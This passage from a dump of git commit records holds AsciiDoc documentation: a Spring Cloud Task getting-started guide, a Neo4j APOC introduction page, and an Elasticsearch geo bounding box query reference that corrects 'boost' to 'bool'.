\/Users\/mminella\/Documents\/IntelliJWorkspace\/spring-cloud-task-example)\n2016-01-25 11:08:10.185 INFO 12943 --- [ main] com.example.SampleTask : No active profile set, falling back to default profiles: default\n2016-01-25 11:08:10.226 INFO 12943 --- [ main] s.c.a.AnnotationConfigApplicationContext : Refreshing org.springframework.context.annotation.AnnotationConfigApplicationContext@2a2c3676: startup date [Mon Jan 25 11:08:10 CST 2016]; root of context hierarchy\n2016-01-25 11:08:11.051 INFO 12943 --- [ main] o.s.j.e.a.AnnotationMBeanExporter : Registering beans for JMX exposure on startup\n2016-01-25 11:08:11.065 INFO 12943 --- [ main] o.s.c.t.r.support.SimpleTaskRepository : Creating: TaskExecution{executionId=0, externalExecutionID='null', exitCode=0, taskName='application', startTime=Mon Jan 25 11:08:11 CST 2016, endTime=null, statusCode='null', exitMessage='null', arguments=[]}\nHello World!\n2016-01-25 11:08:11.071 INFO 12943 --- [ main] com.example.SampleTask : Started SampleTask in 1.095 seconds (JVM running for 3.826)\n2016-01-25 11:08:11.220 INFO 12943 --- [ Thread-1] s.c.a.AnnotationConfigApplicationContext : Closing org.springframework.context.annotation.AnnotationConfigApplicationContext@2a2c3676: startup date [Mon Jan 25 11:08:10 CST 2016]; root of context hierarchy\n2016-01-25 11:08:11.222 INFO 12943 --- [ Thread-1] o.s.c.t.r.support.SimpleTaskRepository : Updating: TaskExecution{executionId=0, externalExecutionID='null', exitCode=0, taskName='application', startTime=Mon Jan 25 11:08:11 CST 2016, endTime=Mon Jan 25 11:08:11 CST 2016, statusCode='null', exitMessage='null', arguments=[]}\n2016-01-25 11:08:11.222 INFO 12943 --- [ Thread-1] o.s.j.e.a.AnnotationMBeanExporter : Unregistering JMX-exposed beans on shutdown\n----\n\nIf you notice, there are three lines of interest in the above output:\n\n* `SimpleTaskRepository` logged out the creation of the entry in the `TaskRepository`.\n* The execution of our `CommandLineRunner`, demonstrated by the \"Hello World!\" output.\n* `SimpleTaskRepository` logging the completion of the task in the `TaskRepository`.\n\nNOTE: A simple task application can be found in the samples module\nof the Spring Cloud Task Project\nhttps:\/\/github.com\/spring-cloud\/spring-cloud-task\/tree\/master\/spring-cloud-task-samples\/timestamp[here].\n\n\n=== Writing your test\n\nWhen writing your unit tests for a Spring Cloud Task application we have to keep\nin mind that Spring Cloud Task closes the context at the completion of the task\nas discussed <<features.adoc#features-lifecycle, here>>. If you are using Spring\nFramework's testing functionality to manage the application context, you'll want to turn\noff Spring Cloud Task's auto-closing of the context. Add the following\nline: `@TestPropertySource(properties = {\"spring.cloud.task.closecontext_enable=false\"})`\nto your tests will keep the context open. For example:\n\n```\n@RunWith(SpringRunner.class)\n@SpringBootTest\n@TestPropertySource(properties = {\"spring.cloud.task.closecontext_enabled=false\"})\npublic class DemoApplicationTests {\n\n\t@Test\n\tpublic void contextLoads() {\n\t\/\/your test here\n\t}\n\n}\n```","old_contents":"\n[[getting-started]]\n= Getting started\n\n[[partintro]]\n--\nIf you're just getting started with Spring Cloud Task, this is the section\nfor you! Here we answer the basic \"`what?`\", \"`how?`\" and \"`why?`\" questions. You'll\nfind a gentle introduction to Spring Cloud Task. We'll then build our first Spring Cloud\nTask application, discussing some core principles as we go.\n--\n\n[[getting-started-introducing-spring-cloud-task]]\n== Introducing Spring Cloud Task\n\nSpring Cloud Task makes it easy to create short lived microservices. We provide\ncapabilities that allow short lived JVM processes to be executed on demand in a production\nenvironment.\n\n[[getting-started-system-requirements]]\n== System Requirements\n\nYou need Java installed (Java 7 or better, we recommend Java 8) and to build you need to have Maven installed as well.\n\n=== Database Requirements\n\nSpring Cloud Task uses a relational database to store the results of an executed task.\nWhile you can begin developing a task without a database (the status of the task is logged\n as part of the task repository's updates), for production environments, you'll want to\nutilize a supported database. Below is a list of the ones currently supported:\n\n- DB2\n- H2\n- HSQLDB\n- MySql\n- Oracle\n- Postgres\n- SqlServer\n\n[[getting-started-developing-first-task]]\n== Developing your first Spring Cloud Task application\n\nA good place to start is with a simple \"Hello World!\" application so we'll create the\nSpring Cloud Task equivalent to highlight the features of the framework. We'll use Apache\nMaven as a build tool for this project since most IDEs have good support for it.\n\nNOTE: The spring.io web site contains many \u201cGetting Started\u201d guides that use Spring Boot.\nIf you\u2019re looking to solve a specific problem; check there first. You can shortcut the\nsteps below by going to start.spring.io and creating a new project. This will\nautomatically generate a new project structure so that you can start coding right the way.\nCheck the documentation for more details.\n\nBefore we begin, open a terminal to check that you have valid versions of Java and Maven\ninstalled.\n\n[source]\n$ java -version\njava version \"1.8.0_31\"\nJava(TM) SE Runtime Environment (build 1.8.0_31-b13)\nJava HotSpot(TM) 64-Bit Server VM (build 25.31-b07, mixed mode)\n\n[source]\n$ mvn -v\nApache Maven 3.2.3 (33f8c3e1027c3ddde99d3cdebad2656a31e8fdf4; 2014-08-11T15:58:10-05:00)\nMaven home: \/usr\/local\/Cellar\/maven\/3.2.3\/libexec\nJava version: 1.8.0_31, vendor: Oracle Corporation\n\nNOTE: This sample needs to be created in its own folder. Subsequent instructions assume\nyou have created a suitable folder and that it is your \"current directory\".\n\n[[getting-started-creating-the-pom]]\n=== Creating the POM\n\nWe need to start by creating a Maven `pom.xml` file. The `pom.xml` is the recipe that\nwill be used to build your project. Open your favorite text editor and add the following:\n\n[code,xml]\n----\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<project xmlns=\"http:\/\/maven.apache.org\/POM\/4.0.0\"\n\t\t xmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n\t\t xsi:schemaLocation=\"http:\/\/maven.apache.org\/POM\/4.0.0 http:\/\/maven.apache.org\/xsd\/maven-4.0.0.xsd\">\n\n\t<modelVersion>4.0.0<\/modelVersion>\n\n\t<groupId>com.example<\/groupId>\n\t<artifactId>myproject<\/artifactId>\n\t<packaging>jar<\/packaging>\n\t<version>0.0.1-SNAPSHOT<\/version>\n\n\t<parent>\n\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t<artifactId>spring-boot-starter-parent<\/artifactId>\n\t\t<version>1.5.2.RELEASE<\/version>\n\t<\/parent>\n\n\t<properties>\n\t\t<start-class>com.example.SampleTask<\/start-class>\n\t<\/properties>\n\n\t<dependencies>\n\t\t<dependency>\n\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t<artifactId>spring-boot-starter<\/artifactId>\n\t\t<\/dependency>\n\t<\/dependencies>\n\n\t<build>\n\t\t<plugins>\n\t\t\t<plugin>\n\t\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t\t<artifactId>spring-boot-maven-plugin<\/artifactId>\n\t\t\t<\/plugin>\n\t\t<\/plugins>\n\t<\/build>\n<\/project>\n----\n\nThis should give you a working build. You can test it out by running `mvn package` (you\ncan ignore the \"jar will be empty - no content was marked for inclusion!\" warning for\nnow).\n\nNOTE: At this point you could import the project into an IDE (most modern Java IDE's\ninclude built-in support for Maven). For simplicity we will continue to use a plain text\neditor for this example.\n\n[[getting-started-adding-classpath-dependencies]]\n=== Adding classpath dependencies\n\nA Spring Cloud Task is made up of a Spring Boot application that is expected to end. In\nour POM above, we created the shell of a Spring Boot application from a dependency\nperspective by setting our parent to use the `spring-boot-starter-parent`.\n\nSpring Boot provides a number of additional \"Starter POMs\". Some of which are appropriate\nfor use within tasks (`spring-boot-starter-batch`, `spring-boot-starter-jdbc`, etc) and\nsome may not be ('spring-boot-starter-web` is probably not going to be used in a task).\nThe indicator of if a starter makes sense or not comes down to if the resulting\napplication will end (batch based applications typically end, the\n`spring-boot-starter-web` dependency bootstraps a servlet container which probably wont').\n\nFor this example, we'll only need to add a single additional dependency, the one for\nSpring Cloud Task itself:\n\n[source,xml]\n\t\t<dependency>\n\t\t\t<groupId>org.springframework.cloud<\/groupId>\n\t\t\t<artifactId>spring-cloud-task-core<\/artifactId>\n\t\t\t<version>1.2.1.RELEASE<\/version>\n\t\t<\/dependency>\n\n[[getting-started-writing-the-code]]\n=== Writing the code\n\nTo finish our application, we need to create a single Java file. Maven will compile the\nsources from `src\/main\/java` by default so you need to create that folder structure. Then\nadd a file named `src\/main\/java\/com\/example\/SampleTask.java`:\n\n[source,java]\n----\npackage com.example;\n\nimport org.springframework.boot.*;\nimport org.springframework.boot.autoconfigure.SpringBootApplication;\nimport org.springframework.cloud.task.configuration.EnableTask;\nimport org.springframework.context.annotation.Bean;\n\n@SpringBootApplication\n@EnableTask\npublic class SampleTask {\n\n\t@Bean\n\tpublic CommandLineRunner commandLineRunner() {\n\t\treturn new HelloWorldCommandLineRunner();\n\t}\n\n\tpublic static void main(String[] args) {\n\t\tSpringApplication.run(SampleTask.class, args);\n\t}\n\n\tpublic static class HelloWorldCommandLineRunner implements CommandLineRunner {\n\n\t\t@Override\n\t\tpublic void run(String... strings) throws Exception {\n\t\t\tSystem.out.println(\"Hello World!\");\n\t\t}\n\t}\n}\n----\n\nWhile it may not look like much, quite a bit is going on. To read more about the Spring\nBoot specifics, take a look at their reference documentation here:\nhttp:\/\/docs.spring.io\/spring-boot\/docs\/current\/reference\/html\/[http:\/\/docs.spring.io\/spring-boot\/docs\/current\/reference\/html\/]\n\nWe'll also need to create an `application.properties` in `src\/main\/resources`. We'll\nconfigure two properties in it: the application name (which is translated to the task name)\nand we'll set the logging for spring cloud task to `DEBUG` so that we can see what's going\non:\n\n[source]\n----\nlogging.level.org.springframework.cloud.task=DEBUG\nspring.application.name=helloWorld\n----\n\n[[getting-started-at-task]]\n==== The @EnableTask annotation\n\nThe first non boot annotation in our example is the `@EnableTask` annotation. This class\nlevel annotation tells Spring Cloud Task to bootstrap it's functionality. This occurs by\nimporting an additional configuration class, `SimpleTaskConfiguration` by default. This\nadditional configuration registers the `TaskRepository` and the infrastructure for its\nuse.\n\nOut of the box, the `TaskRepository` will use an in memory `Map` to record the results\nof a task. Obviously this isn't a practical solution for a production environment since\nthe `Map` goes away once the task ends. However, for a quick getting started\nexperience we use this as a default as well as echoing to the logs what is being updated\nin that repository. Later in this documentation we'll cover how to customize the\nconfiguration of the pieces provided by Spring Cloud Task.\n\nWhen our sample application is run, Spring Boot will launch our\n`HelloWorldCommandLineRunner` outputting our \"Hello World!\" message to standard out. The\n`TaskLifecyceListener` will record the start of the task and the end of the task in the\nrepository.\n\n[[getting-started-main-method]]\n==== The main method\n\nThe main method serves as the entry point to any java application. Our main method\ndelegates to Spring Boot's `SpringApplication` class. You can read more about it in the\nSpring Boot documentation.\n\n[[getting-started-clr]]\n==== The CommandLineRunner\n\nIn Spring, there are many ways to bootstrap an application's logic. Spring Boot provides\na convenient method of doing so in an organized manner via their `*Runner` interfaces\n(`CommandLineRunner` or `ApplicationRunner`). A well behaved task will bootstrap any\nlogic via one of these two runners.\n\nThe lifecycle of a task is considered from before the `*Runner#run` methods are executed\nto once they are all complete. Spring Boot allows an application to use multiple\n`*Runner` implementation and Spring Cloud Task doesn't attempt to impede on this convention.\n\nNOTE: Any processing bootstrapped from mechanisms other than a `CommandLineRunner` or\n`ApplicationRunner` (using `InitializingBean#afterPropertiesSet` for example) will not be\n recorded by Spring Cloud Task.\n\n[[getting-started-running-the-example]]\n=== Running the example\n\nAt this point, your application should work. Since this application is Spring Boot based,\n we can run it from the command line via the command `$ mvn spring-boot:run` from the root\n of our applicaiton:\n\n[source]\n----\n$ mvn clean spring-boot:run\n....... . . .\n....... . . . (Maven log output here)\n....... . . .\n\n\n . ____ _ __ _ _\n \/\\\\ \/ ___'_ __ _ _(_)_ __ __ _ \\ \\ \\ \\\n( ( )\\___ | '_ | '_| | '_ \\\/ _` | \\ \\ \\ \\\n \\\\\/ ___)| |_)| | | | | || (_| | ) ) ) )\n ' |____| .__|_| |_|_| |_\\__, | \/ \/ \/ \/\n =========|_|==============|___\/=\/_\/_\/_\/\n :: Spring Boot :: (v1.3.3.RELEASE)\n\n2016-01-25 11:08:10.183 INFO 12943 --- [ main] com.example.SampleTask : Starting SampleTask on Michaels-MacBook-Pro-2.local with PID 12943 (\/Users\/mminella\/Documents\/IntelliJWorkspace\/spring-cloud-task-example\/target\/classes started by mminella in \/Users\/mminella\/Documents\/IntelliJWorkspace\/spring-cloud-task-example)\n2016-01-25 11:08:10.185 INFO 12943 --- [ main] com.example.SampleTask : No active profile set, falling back to default profiles: default\n2016-01-25 11:08:10.226 INFO 12943 --- [ main] s.c.a.AnnotationConfigApplicationContext : Refreshing org.springframework.context.annotation.AnnotationConfigApplicationContext@2a2c3676: startup date [Mon Jan 25 11:08:10 CST 2016]; root of context hierarchy\n2016-01-25 11:08:11.051 INFO 12943 --- [ main] o.s.j.e.a.AnnotationMBeanExporter : Registering beans for JMX exposure on startup\n2016-01-25 11:08:11.065 INFO 12943 --- [ main] o.s.c.t.r.support.SimpleTaskRepository : Creating: TaskExecution{executionId=0, externalExecutionID='null', exitCode=0, taskName='application', startTime=Mon Jan 25 11:08:11 CST 2016, endTime=null, statusCode='null', exitMessage='null', arguments=[]}\nHello World!\n2016-01-25 11:08:11.071 INFO 12943 --- [ main] com.example.SampleTask : Started SampleTask in 1.095 seconds (JVM running for 3.826)\n2016-01-25 11:08:11.220 INFO 12943 --- [ Thread-1] s.c.a.AnnotationConfigApplicationContext : Closing org.springframework.context.annotation.AnnotationConfigApplicationContext@2a2c3676: startup date [Mon Jan 25 11:08:10 CST 2016]; root of context hierarchy\n2016-01-25 11:08:11.222 INFO 12943 --- [ Thread-1] o.s.c.t.r.support.SimpleTaskRepository : Updating: TaskExecution{executionId=0, externalExecutionID='null', exitCode=0, taskName='application', startTime=Mon Jan 25 11:08:11 CST 2016, endTime=Mon Jan 25 11:08:11 CST 2016, statusCode='null', exitMessage='null', arguments=[]}\n2016-01-25 11:08:11.222 INFO 12943 --- [ Thread-1] o.s.j.e.a.AnnotationMBeanExporter : Unregistering JMX-exposed beans on shutdown\n----\n\nIf you notice, there are three lines of interest in the above output:\n\n* `SimpleTaskRepository` logged out the creation of the entry in the `TaskRepository`.\n* The execution of our `CommandLineRunner`, demonstrated by the \"Hello World!\" output.\n* `SimpleTaskRepository` logging the completion of the task in the `TaskRepository`.\n\nNOTE: A simple task application can be found in the samples module\nof the Spring Cloud Task Project\nhttps:\/\/github.com\/spring-cloud\/spring-cloud-task\/tree\/master\/spring-cloud-task-samples\/timestamp[here].\n\n\n=== Writing your test\n\nWhen writing your unit tests for a Spring Cloud Task application we have to keep\nin mind that Spring Cloud Task closes the context at the completion of the task\nas discussed <<features.adoc#features-lifecycle, here>>. If you are using Spring\nFramework's testing functionality to manage the application context, you'll want to turn\noff Spring Cloud Task's auto-closing of the context. Add the following\nline: `@TestPropertySource(properties = {\"spring.cloud.task.closecontext_enable=false\"})`\nto your tests will keep the context open. For example:\n\n```\n@RunWith(SpringRunner.class)\n@SpringBootTest\n@TestPropertySource(properties = {\"spring.cloud.task.closecontext_enabled=false\"})\npublic class DemoApplicationTests {\n\n\t@Test\n\tpublic void contextLoads() {\n\t\/\/your test here\n\t}\n\n}\n```","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"00b1f93732d6b2597f8ee048886b465a79ab760a","subject":"Improve clarity on editions and add some links (#2244) (#2305)","message":"Improve clarity on editions and add some links (#2244) (#2305)\n\nCo-authored-by: Michael Hunger <64b2b6d12bfe4baae7dad3d018f8cbf6b0e7a044@jexp.de>","repos":"neo4j-contrib\/neo4j-apoc-procedures,neo4j-contrib\/neo4j-apoc-procedures,neo4j-contrib\/neo4j-apoc-procedures,neo4j-contrib\/neo4j-apoc-procedures","old_file":"docs\/asciidoc\/modules\/ROOT\/pages\/introduction\/index.adoc","new_file":"docs\/asciidoc\/modules\/ROOT\/pages\/introduction\/index.adoc","new_contents":"[[introduction]]\n= Introduction\n:description: This chapter provides an introduction to the APOC library, and instructions for installation and use.\n\n\n\n\nifdef::backend-html5[]\n++++\n<iframe width=\"560\" height=\"315\" src=\"https:\/\/www.youtube.com\/embed\/V1DTBjetIfk\" frameborder=\"0\" allow=\"autoplay; encrypted-media\" allowfullscreen><\/iframe>\n++++\nendif::[]\n\nNeo4j 3.x introduced the concept of user-defined procedures and functions.\nThose are custom implementations of certain functionality, that can't be (easily) expressed in Cypher itself.\nThey are implemented in Java and can be easily deployed into your Neo4j instance, and then be called from Cypher directly.\n\nThe APOC library consists of many (about 450) procedures and functions to help with many different tasks in areas like data integration, graph algorithms or data conversion.\n\n\n[NOTE]\n====\n.APOC Name History\n\nhttp:\/\/matrix.wikia.com\/wiki\/Apoc[Apoc^] was the technician and driver on board of the Nebuchadnezzar in the Matrix movie. He was killed by Cypher.\n\n*APOC* was also the first bundled http:\/\/neo4j.com\/blog\/convenient-package-neo4j-apoc-0-1-released\/[A Package Of Component^] for Neo4j in 2009.\n\n*APOC* also stands for \"Awesome Procedures On Cypher\"\n====\n\n== APOC Editions - Core and Full\n\nStarting from Neo4j 4.1.1, there are two available versions of the APOC Library:\n\n_APOC Core_ :: battle hardened procedures and functions that don't have external dependencies or require configuration. This is also the based of the functionality available in https:\/\/neo4j.com\/aura[Neo4j AuraDB^] which lists the https:\/\/neo4j.com\/docs\/aura\/current\/getting-started\/apoc\/[available APOC surface in their docs^].\n_APOC Full_ :: contains everything in APOC core, as well as additional procedures and functions, which is available both in https:\/\/neo4j.com\/sandbox[Neo4j Sandbox^], the https:\/\/neo4j.com\/docs\/operations-manual\/current\/docker\/operations\/#docker-neo4jlabs-pluginsneo4j.com[Docker image^] and https:\/\/neo4j.com\/docs\/desktop-manual\/current\/operations\/#install-plugin[Neo4j Desktop^], as well as when you self-host the database and add the apoc-full jar.\n\n\nA list of functions and procedures in _APOC Core_ and _APOC Full_ can be found in xref::overview\/index.adoc[].\n","old_contents":"[[introduction]]\n= Introduction\n:description: This chapter provides an introduction to the APOC library, and instructions for installation and use.\n\n\n\n\nifdef::backend-html5[]\n++++\n<iframe width=\"560\" height=\"315\" src=\"https:\/\/www.youtube.com\/embed\/V1DTBjetIfk\" frameborder=\"0\" allow=\"autoplay; encrypted-media\" allowfullscreen><\/iframe>\n++++\nendif::[]\n\nNeo4j 3.x introduced the concept of user-defined procedures and functions.\nThose are custom implementations of certain functionality, that can't be (easily) expressed in Cypher itself.\nThey are implemented in Java and can be easily deployed into your Neo4j instance, and then be called from Cypher directly.\n\nThe APOC library consists of many (about 450) procedures and functions to help with many different tasks in areas like data integration, graph algorithms or data conversion.\n\n\n[NOTE]\n====\n.APOC Name History\n\nhttp:\/\/matrix.wikia.com\/wiki\/Apoc[Apoc^] was the technician and driver on board of the Nebuchadnezzar in the Matrix movie. He was killed by Cypher.\n\n*APOC* was also the first bundled http:\/\/neo4j.com\/blog\/convenient-package-neo4j-apoc-0-1-released\/[A Package Of Component^] for Neo4j in 2009.\n\n*APOC* also stands for \"Awesome Procedures On Cypher\"\n====\n\nStarting from Neo4j 4.1.1, there are two available versions of the APOC Library:\n\n_APOC Core_ :: battle hardened procedures and functions that don't have external dependencies or require configuration.\n_APOC Full_ :: contains everything in APOC core, as well as additional procedures and functions.\n\n\nA list of functions and procedures in _APOC Core_ and _APOC Full_ can be found in xref::overview\/index.adoc[].","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"3121f8466dcd84ab55966f4d96c176ae957b2ea0","subject":"Changed boost keyword with bool in bounding box query","message":"Changed boost keyword with bool in bounding box query\n","repos":"baishuo\/elasticsearch_v2.1.0-baishuo,baishuo\/elasticsearch_v2.1.0-baishuo,baishuo\/elasticsearch_v2.1.0-baishuo,baishuo\/elasticsearch_v2.1.0-baishuo,baishuo\/elasticsearch_v2.1.0-baishuo,baishuo\/elasticsearch_v2.1.0-baishuo,baishuo\/elasticsearch_v2.1.0-baishuo","old_file":"docs\/reference\/query-dsl\/geo-bounding-box-query.asciidoc","new_file":"docs\/reference\/query-dsl\/geo-bounding-box-query.asciidoc","new_contents":"[[query-dsl-geo-bounding-box-query]]\n=== Geo Bounding Box Query\n\nA query allowing to filter hits based on a point location using a\nbounding box. Assuming the following indexed document:\n\n[source,js]\n--------------------------------------------------\n{\n \"pin\" : {\n \"location\" : {\n \"lat\" : 40.12,\n \"lon\" : -71.34\n }\n }\n}\n--------------------------------------------------\n\nThen the following simple query can be executed with a\n`geo_bounding_box` filter:\n\n[source,js]\n--------------------------------------------------\n{\n \"bool\" : {\n \"must\" : {\n \"match_all\" : {}\n },\n \"filter\" : {\n \"geo_bounding_box\" : {\n \"pin.location\" : {\n \"top_left\" : {\n \"lat\" : 40.73,\n \"lon\" : -74.1\n },\n \"bottom_right\" : {\n \"lat\" : 40.01,\n \"lon\" : -71.12\n }\n }\n }\n }\n }\n}\n--------------------------------------------------\n\n[float]\n==== Query Options\n\n[cols=\"<,<\",options=\"header\",]\n|=======================================================================\n|Option |Description\n|`_name` |Optional name field to identify the filter\n\n|`coerce` |Set to `true` to normalize longitude and latitude values to a\nstandard -180:180 \/ -90:90 coordinate system. (default is `false`).\n\n|`ignore_malformed` |Set to `true` to\naccept geo points with invalid latitude or longitude (default is `false`).\n\n|`type` |Set to one of `indexed` or `memory` to defines whether this filter will\nbe executed in memory or indexed. See <<geo-bbox-type,Type>> below for further details\nDefault is `memory`.\n|=======================================================================\n\n[float]\n==== Accepted Formats\n\nIn much the same way the geo_point type can accept different\nrepresentation of the geo point, the filter can accept it as well:\n\n[float]\n===== Lat Lon As Properties\n\n[source,js]\n--------------------------------------------------\n{\n \"bool\" : {\n \"must\" : {\n \"match_all\" : {}\n },\n \"filter\" : {\n \"geo_bounding_box\" : {\n \"pin.location\" : {\n \"top_left\" : {\n \"lat\" : 40.73,\n \"lon\" : -74.1\n },\n \"bottom_right\" : {\n \"lat\" : 40.01,\n \"lon\" : -71.12\n }\n }\n }\n }\n }\n}\n--------------------------------------------------\n\n[float]\n===== Lat Lon As Array\n\nFormat in `[lon, lat]`, note, the order of lon\/lat here in order to\nconform with http:\/\/geojson.org\/[GeoJSON].\n\n[source,js]\n--------------------------------------------------\n{\n \"bool\" : {\n \"must\" : {\n \"match_all\" : {}\n },\n \"filter\" : {\n \"geo_bounding_box\" : {\n \"pin.location\" : {\n \"top_left\" : [-74.1, 40.73],\n \"bottom_right\" : [-71.12, 40.01]\n }\n }\n }\n }\n}\n--------------------------------------------------\n\n[float]\n===== Lat Lon As String\n\nFormat in `lat,lon`.\n\n[source,js]\n--------------------------------------------------\n{\n \"bool\" : {\n \"must\" : {\n \"match_all\" : {}\n },\n \"filter\" : {\n \"geo_bounding_box\" : {\n \"pin.location\" : {\n \"top_left\" : \"40.73, -74.1\",\n \"bottom_right\" : \"40.01, -71.12\"\n }\n }\n }\n }\n}\n--------------------------------------------------\n\n[float]\n===== Geohash\n\n[source,js]\n--------------------------------------------------\n{\n \"bool\" : {\n \"must\" : {\n \"match_all\" : {}\n },\n \"filter\" : {\n \"geo_bounding_box\" : {\n \"pin.location\" : {\n \"top_left\" : \"dr5r9ydj2y73\",\n \"bottom_right\" : \"drj7teegpus6\"\n }\n }\n }\n }\n}\n--------------------------------------------------\n\n[float]\n==== Vertices\n\nThe vertices of the bounding box can either be set by `top_left` and\n`bottom_right` or by `top_right` and `bottom_left` parameters. More\nover the names `topLeft`, `bottomRight`, `topRight` and `bottomLeft`\nare supported. Instead of setting the values pairwise, one can use\nthe simple names `top`, `left`, `bottom` and `right` to set the\nvalues separately.\n\n[source,js]\n--------------------------------------------------\n{\n \"bool\" : {\n \"must\" : {\n \"match_all\" : {}\n },\n \"filter\" : {\n \"geo_bounding_box\" : {\n \"pin.location\" : {\n \"top\" : -74.1,\n \"left\" : 40.73,\n \"bottom\" : -71.12,\n \"right\" : 40.01\n }\n }\n }\n }\n}\n--------------------------------------------------\n\n\n[float]\n==== geo_point Type\n\nThe filter *requires* the `geo_point` type to be set on the relevant\nfield.\n\n[float]\n==== Multi Location Per Document\n\nThe filter can work with multiple locations \/ points per document. Once\na single location \/ point matches the filter, the document will be\nincluded in the filter\n\n[float]\n[[geo-bbox-type]]\n==== Type\n\nThe type of the bounding box execution by default is set to `memory`,\nwhich means in memory checks if the doc falls within the bounding box\nrange. In some cases, an `indexed` option will perform faster (but note\nthat the `geo_point` type must have lat and lon indexed in this case).\nNote, when using the indexed option, multi locations per document field\nare not supported. Here is an example:\n\n[source,js]\n--------------------------------------------------\n{\n \"bool\" : {\n \"must\" : {\n \"match_all\" : {}\n },\n \"filter\" : {\n \"geo_bounding_box\" : {\n \"pin.location\" : {\n \"top_left\" : {\n \"lat\" : 40.73,\n \"lon\" : -74.1\n },\n \"bottom_right\" : {\n \"lat\" : 40.10,\n \"lon\" : -71.12\n }\n },\n \"type\" : \"indexed\"\n }\n }\n }\n}\n--------------------------------------------------\n\n","old_contents":"[[query-dsl-geo-bounding-box-query]]\n=== Geo Bounding Box Query\n\nA query allowing to filter hits based on a point location using a\nbounding box. Assuming the following indexed document:\n\n[source,js]\n--------------------------------------------------\n{\n \"pin\" : {\n \"location\" : {\n \"lat\" : 40.12,\n \"lon\" : -71.34\n }\n }\n}\n--------------------------------------------------\n\nThen the following simple query can be executed with a\n`geo_bounding_box` filter:\n\n[source,js]\n--------------------------------------------------\n{\n \"bool\" : {\n \"must\" : {\n \"match_all\" : {}\n },\n \"filter\" : {\n \"geo_bounding_box\" : {\n \"pin.location\" : {\n \"top_left\" : {\n \"lat\" : 40.73,\n \"lon\" : -74.1\n },\n \"bottom_right\" : {\n \"lat\" : 40.01,\n \"lon\" : -71.12\n }\n }\n }\n }\n }\n}\n--------------------------------------------------\n\n[float]\n==== Query Options\n\n[cols=\"<,<\",options=\"header\",]\n|=======================================================================\n|Option |Description\n|`_name` |Optional name field to identify the filter\n\n|`coerce` |Set to `true` to normalize longitude and latitude values to a\nstandard -180:180 \/ -90:90 coordinate system. (default is `false`).\n\n|`ignore_malformed` |Set to `true` to\naccept geo points with invalid latitude or longitude (default is `false`).\n\n|`type` |Set to one of `indexed` or `memory` to defines whether this filter will\nbe executed in memory or indexed. See <<geo-bbox-type,Type>> below for further details\nDefault is `memory`.\n|=======================================================================\n\n[float]\n==== Accepted Formats\n\nIn much the same way the geo_point type can accept different\nrepresentation of the geo point, the filter can accept it as well:\n\n[float]\n===== Lat Lon As Properties\n\n[source,js]\n--------------------------------------------------\n{\n \"boost\" : {\n \"must\" : {\n \"match_all\" : {}\n },\n \"filter\" : {\n \"geo_bounding_box\" : {\n \"pin.location\" : {\n \"top_left\" : {\n \"lat\" : 40.73,\n \"lon\" : -74.1\n },\n \"bottom_right\" : {\n \"lat\" : 40.01,\n \"lon\" : -71.12\n }\n }\n }\n }\n }\n}\n--------------------------------------------------\n\n[float]\n===== Lat Lon As Array\n\nFormat in `[lon, lat]`, note, the order of lon\/lat here in order to\nconform with http:\/\/geojson.org\/[GeoJSON].\n\n[source,js]\n--------------------------------------------------\n{\n \"bool\" : {\n \"must\" : {\n \"match_all\" : {}\n },\n \"filter\" : {\n \"geo_bounding_box\" : {\n \"pin.location\" : {\n \"top_left\" : [-74.1, 40.73],\n \"bottom_right\" : [-71.12, 40.01]\n }\n }\n }\n }\n}\n--------------------------------------------------\n\n[float]\n===== Lat Lon As String\n\nFormat in `lat,lon`.\n\n[source,js]\n--------------------------------------------------\n{\n \"bool\" : {\n \"must\" : {\n \"match_all\" : {}\n },\n \"filter\" : {\n \"geo_bounding_box\" : {\n \"pin.location\" : {\n \"top_left\" : \"40.73, -74.1\",\n \"bottom_right\" : \"40.01, -71.12\"\n }\n }\n }\n }\n}\n--------------------------------------------------\n\n[float]\n===== Geohash\n\n[source,js]\n--------------------------------------------------\n{\n \"bool\" : {\n \"must\" : {\n \"match_all\" : {}\n },\n \"filter\" : {\n \"geo_bounding_box\" : {\n \"pin.location\" : {\n \"top_left\" : \"dr5r9ydj2y73\",\n \"bottom_right\" : \"drj7teegpus6\"\n }\n }\n }\n }\n}\n--------------------------------------------------\n\n[float]\n==== Vertices\n\nThe vertices of the bounding box can either be set by `top_left` and\n`bottom_right` or by `top_right` and `bottom_left` parameters. More\nover the names `topLeft`, `bottomRight`, `topRight` and `bottomLeft`\nare supported. Instead of setting the values pairwise, one can use\nthe simple names `top`, `left`, `bottom` and `right` to set the\nvalues separately.\n\n[source,js]\n--------------------------------------------------\n{\n \"bool\" : {\n \"must\" : {\n \"match_all\" : {}\n },\n \"filter\" : {\n \"geo_bounding_box\" : {\n \"pin.location\" : {\n \"top\" : -74.1,\n \"left\" : 40.73,\n \"bottom\" : -71.12,\n \"right\" : 40.01\n }\n }\n }\n }\n}\n--------------------------------------------------\n\n\n[float]\n==== geo_point Type\n\nThe filter *requires* the `geo_point` type to be set on the relevant\nfield.\n\n[float]\n==== Multi Location Per Document\n\nThe filter can work with multiple locations \/ points per document. Once\na single location \/ point matches the filter, the document will be\nincluded in the filter\n\n[float]\n[[geo-bbox-type]]\n==== Type\n\nThe type of the bounding box execution by default is set to `memory`,\nwhich means in memory checks if the doc falls within the bounding box\nrange. In some cases, an `indexed` option will perform faster (but note\nthat the `geo_point` type must have lat and lon indexed in this case).\nNote, when using the indexed option, multi locations per document field\nare not supported. Here is an example:\n\n[source,js]\n--------------------------------------------------\n{\n \"bool\" : {\n \"must\" : {\n \"match_all\" : {}\n },\n \"filter\" : {\n \"geo_bounding_box\" : {\n \"pin.location\" : {\n \"top_left\" : {\n \"lat\" : 40.73,\n \"lon\" : -74.1\n },\n \"bottom_right\" : {\n \"lat\" : 40.10,\n \"lon\" : -71.12\n }\n },\n \"type\" : \"indexed\"\n }\n }\n }\n}\n--------------------------------------------------\n\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4e40c2fd03237039c4a927c8a4cd5bdf58d3fb6e","subject":"DBZ-4733 Listing mongodb.connection.string in MongoDB property docs","message":"DBZ-4733 Listing mongodb.connection.string in MongoDB 